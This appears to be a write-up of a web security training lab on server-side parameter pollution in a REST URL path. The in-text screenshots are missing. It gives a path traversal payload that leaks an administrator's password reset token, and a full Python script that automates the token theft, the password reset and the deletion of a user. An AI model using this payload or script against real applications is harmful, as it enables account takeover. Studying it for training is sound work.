5. Exploiting server-side parameter pollution in a REST URL

Open the vulnerable application:

Lets navigate through the web application:

Forgot password:

Lets go to burpsuite:

Send it to the repeater and add # to it:

Lets try path traversal sequence on it:

It says invalid route so maybe this could refer to restful url path parameter pollution.

Lets find out:

I asked chatgpt, what is the name of the documented file for restful api:

Lets try openapi.json first:

Here we go we found the internal api, so username is a parameter, lets find if we can access field like the previous lab:

Here we go like the previous lab there is an email field as a value that we can access it:

And as the forgotPassword.js file in the burpsuite history, we have to find the PasswordResetToken to reset the administrator password:

Lets try get it:

It errors, and says that this version of the api only supports the email value to be parsed:

And as mentioned in a previous photo that the version is 2, lets try changing it to v1:

So we have to path traverse to get to the /internal to set the version to one:

../../v1/users/administrator/field/passwordResetToken%23

And here we go, we got the token:

Lets go reset it using the path mentioned in the forgotPassword.js file:

/forgot-password?passwordResetToken=token we found

And here we go:

After changing the password:

Lets navigate to the admin panel to delete the carols user to solve this lab:

And yup finally we solved the lab:

Solve it using a python3 script:

import requests  
import re  
import os  
import sys  
import json  
  
proxies = {  
    "http": "http://127.0.0.1:8080",  
    "https": "http://127.0.0.1:8080"  
}  
  
session = requests.session()  
  
  
def Login(username, password):  
    print("[*] Get CSRF Token.")  
    csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + "login", proxies=proxies, verify=False).text)  
    print("[*] Logging In.")  
    data = f"csrf={csrf[0]}&username={username}&password={password}"  
    session.post(url=url + "login", data=data, allow_redirects=True, proxies=proxies, verify=False)  
  
  
def GetToken():  
    print("[*] Get Administrator Token.")  
    csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + "forgot-password", proxies=proxies, verify=False).text)  
    data1 = f"csrf={csrf[0]}&username=administrator"  
    session.post(url=url + "forgot-password", data=data1, proxies=proxies, verify=False)  
    data2 = f"csrf={csrf[0]}&username=../../v1/users/administrator/field/passwordResetToken%23"  
    result = json.loads(session.post(url=url + "forgot-password", data=data2, proxies=proxies, verify=False).text)  
    token = result["result"]  
  
    def ChangePass():  
        print("[*] Change Administrator Password.")  
        csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + f"forgot-password?passwordResetToken={token}", proxies=proxies, verify=False).text)  
        data = f"csrf={csrf[0]}&passwordResetToken={token}&new-password-1=Caesar3&new-password-2=Caesar3"  
        session.post(url=url + f"forgot-password?passwordResetToken={token}", data=data, allow_redirects=True, proxies=proxies, verify=False)  
  
    ChangePass()  
  
def DeleteCarlos():  
    print("[*] Login As Administrator.")  
    csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + "login", proxies=proxies, verify=False).text)  
    data = f"csrf={csrf[0]}&username=administrator&password=Caesar3"  
    session.post(url=url + "login", data=data, allow_redirects=True, proxies=proxies, verify=False)  
    print("[*] Delete The User Carlos.")  
    session.post(url=url + "admin/delete?username=carlos", allow_redirects=True, proxies=proxies, verify=False)   
  
  
if __name__ == "__main__":  
    if len(sys.argv) != 2:  
        script_name = os.path.basename(__file__)  
        print(f"[-] Usage: python {script_name} http://localhost/")  
        sys.exit(1)  
    url = sys.argv[1]  
    Login("wiener", "peter")  
    GetToken()  
    DeleteCarlos()  
    print("[+] Solved.")